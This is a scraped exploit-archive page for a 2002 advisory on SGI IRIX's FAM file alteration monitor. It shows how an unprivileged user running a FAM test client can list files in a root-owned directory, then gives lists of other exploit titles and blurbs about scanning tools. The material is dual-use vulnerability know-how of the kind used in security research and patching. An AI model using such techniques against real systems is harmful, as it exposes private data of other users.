Menu

Search for hundreds of thousands of exploits

"SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing"

Author

Exploit author

"Michael Wardle"

Platform

Exploit platform

irix

Release date

Exploit published date

2002-08-16

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
source: https://www.securityfocus.com/bid/5487/info

fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems.

It is possible for a user to execute fam to discover a list of monitored files. This list, while it may have been created by a user of elevated privileges, could leak information to an attacker that may be sensitive. This vulnerability requires only that the directory being 'fammed' already have had the program executed against it by a privileged user.

# ls -ld /root
drwxr-x--- ... root root ... /root
# fam

% groups | grep root

ERRONEOUS BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: .gnome Exists
DIR /root: Desktop Exists
...

CORRECT BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: /root EndExist
---------------------------------------- 
(% indicates a command run as an unprivileged user)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2005-10-10 "SGI IRIX 6.5.28 - 'runpriv' Design Error" local irix anonymous
2005-04-07 "SGI IRIX 6.5.22 - GR_OSView Local Arbitrary File Overwrite" local irix anonymous
2005-04-07 "SGI IRIX 6.5.22 - GR_OSView Information Disclosure" local irix anonymous
2003-05-23 "IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow" dos irix bazarr@ziplip.com
2002-08-16 "SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing" local irix "Michael Wardle"
2002-06-20 "SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution" remote irix "Last Stage of Delirium"
2002-04-12 "IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service" dos irix "Marcelo Magnasco"
2001-09-01 "Irix LPD tagprinter - Command Execution (Metasploit)" remote irix "H D Moore"
2001-06-18 "SGI Performance Co-Pilot 2.1.x/2.2 - pmpost Symbolic Link" local irix IhaQueR
2001-05-08 "IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation" local irix LSD-PLaNET
Release Date Title Type Platform Author
2002-08-16 "SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing" local irix "Michael Wardle" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected